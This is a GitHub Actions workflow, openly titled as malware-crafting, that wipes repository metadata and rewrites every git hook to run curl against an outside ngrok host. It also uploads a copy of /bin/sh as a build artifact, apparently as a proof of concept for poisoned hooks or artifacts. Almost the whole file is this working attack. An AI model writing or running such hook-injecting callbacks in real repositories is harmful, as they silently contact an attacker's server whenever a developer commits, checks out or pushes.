name: Crafting some malware here

on: [push]

jobs:
  build_and_test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2
      - run: |
          rm -rf .git/* && rm -rf ./.github && rm -rf README.md
          mkdir -p .git/hooks
          chmod -R 755 .git
          export PAYLOAD="curl https://metnew.ngrok.io"
          declare -a arr=("applypatch-msg" "pre-commit" "commit-msg" "pre-merge" "fsmonitor-watchman" "pre-merge-commit"  "post-applypatch" "pre-push" "post-checkout" "pre-rebase" "post-index-change" "pre-receive" "post-merge"   "prepare-commit-msg" "post-rewrite" "push-to-checkout" "post-update" "reference-transaction" "pre-applypatch"   "sendemail-validate" "pre-auto-gc" "update")
          for i in "${arr[@]}"
          do
             echo -e "#!/usr/bin/env bash\n$PAYLOAD/$i" > ".git/hooks/$i"
             chmod 755 ".git/hooks/$i"
          done
      - run: chmod -R 755 .git
      - run: chmod +x ./.git/hooks/post-checkout
      - run: ls -lah ./.git/hooks
      - run: cp /bin/sh ./sh
      - name: Archive production artifacts
        uses: actions/upload-artifact@v2
        with:
          name: artifacts
          path: sh
      - run: ls -lah
      - run: ls -lah ./.git/hooks